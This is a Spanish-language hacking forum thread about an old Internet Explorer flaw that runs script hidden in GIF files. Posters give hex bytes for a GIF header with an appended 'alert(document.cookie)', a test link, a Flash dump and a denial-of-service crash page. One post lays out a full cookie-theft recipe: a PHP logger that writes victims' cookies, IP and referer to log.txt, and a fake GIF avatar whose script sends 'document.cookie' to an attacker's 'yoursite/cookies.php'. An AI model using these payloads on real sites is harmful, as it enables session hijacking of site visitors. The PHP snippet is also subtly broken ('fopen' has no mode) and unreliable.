Mensajes

Antes de crear el LOG fijense si funciona un simple ALERT para probar si la vulnerabilidad realmente funciona.

Teniendo en cuenta que en realidad se trata de una omision de IE es posible que quienes visiten el post con el exploit tengan en su explorador el parche adecuado...

Al menos eso creo...

Yo aún no he visto que ese exploit funcione...

podriamos probar poniendo la supuesta imagen en hexa, a ver si funciona (yo no tengo foro en q probar... )
por ejemplo:
la cabecera del gif:

Código [Seleccionar] Expandir

47 49 46 38 39 61 01 00 01 00
y un simple alert:

Código [Seleccionar] Expandir

<HTML><HEAD><SCRIPT>alert(document.cookie);</SCRIPT></HEAD></HTML>
en hexa:

Código [Seleccionar] Expandir

47 49 46 38 39 61 01 00 01 00 3C 48 54 4D 4C 3E 3C 48 45 41 44 3E 3C 53 43
52 49 50 54 3E 61 6C 65 72 74 28 64 6F 63 75 6D 65 6E 74 2E 63 6F 6F 6B 69
65 29 3B 3C 2F 53 43 52 49 50 54 3E 3C 2F 48 45 41 44 3E 3C 2F 48 54 4D 4C
3E


en este caso probamos como cabecera del GIF

Código [Seleccionar] Expandir

GIF89a_--.

para probar (unicamente con IE, con firefox no funciona)

http://planet.nana.co.il/mycoolpictures123/fake/lt2.jpg

PD:adapatacion de un texto de K-Gen

Salu2

este archivo flash:

Código [Seleccionar] Expandir

<swf>

----- [SetBackgroundColor] -----
TagID: 9 (size: 3 (short tag)
- dump ->:
\x43\x02\xff\x00\x00

----- [DoAction] -----
TagID: 12 (size: 60 (short tag)
- dump ->:
\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00
\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43
\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45
\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00

----- [ShowFrame] -----
TagID: 1 (size: 0 (short tag)
- dump ->:
\x40\x00

----- [End] -----
TagID: 0 (size: 0 (short tag)
- dump ->:
\x00\x00

</swf>

que debo modificar para que funcione???? no tengo mucha idea de esto

Salu2

repitiendo el post de tu web...Muy buen trabajo y bien explicado

Salu2

http://foro.elhacker.net/index.php/topic,89986.0.html

Salu2

Está bien Mousehack, parece que a ti lo del C & P se te da muy bien, el-brujo tiene que crear una sección que se llame Copy & Paste, y te ponga a ti de moderador.

Saludos!

Sin comentarios...no vale la pena contestar...

Una cosa, y este 'bug' ¿qué utilidad tiene? Se puede dejar colgada una máquina, pero si la máquina no va a la URL no hay nada. Y remotamente no lo puedes hacer. Así que no le veo mucha importancia a este 'bug'.

remotamente no puedes hacer un DOS en una maquina???...no comment

ahora aclaro algo...en ningun momento dije que el codigo a probar era mio, simplemente que lo probe y se colgo mi browser...por lo demas no vale la pena!!!

Salu2

no tiene que salir ninguna imagen!!! es un gif modificado y el codigo, en principio, crea un archivo ¨log.txt¨ en tu server con las cookies

salu2

asi es...


Salu2

me decidi a probar un bucle infinito en mi PC con IE SP2 y Firefox 1.0.7 y quisiera que me dieran su opinion al respecto...

para probarlo en vuestro browser hacer click en:

http://ha.ckers.org/imagecrash.html

Salu2

por ejemplo hagamos algo asi para realizar un robo de cookie...

creamos un archivo llamado cookie.php con el siguiente codigo:

Código [Seleccionar] Expandir

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt'); // chmod 777 and same directory
fwrite($fp, '<br>Cookie: '.$cookie.'</br> IP: ' .$ip. '<br> Date and Time: ' .$date. '</br> Referer: '.$referer.' ');
fclose($fp);
?>

este codigo creara un archivo log.txt con permiso 777

ahora creamos un avatar para subir a la web vulnerable con el siguiente codigo:

Código [Seleccionar] Expandir

<GIF89aŸ8÷™fÿ™™><html><head><script>alert('http://yoursite/cookies.php?c='+document.cookie);</script></head></html>

y lo guardamos, recordando ponerle la extension .GIF

Salu2

estos son mis buscadores...



XDDD...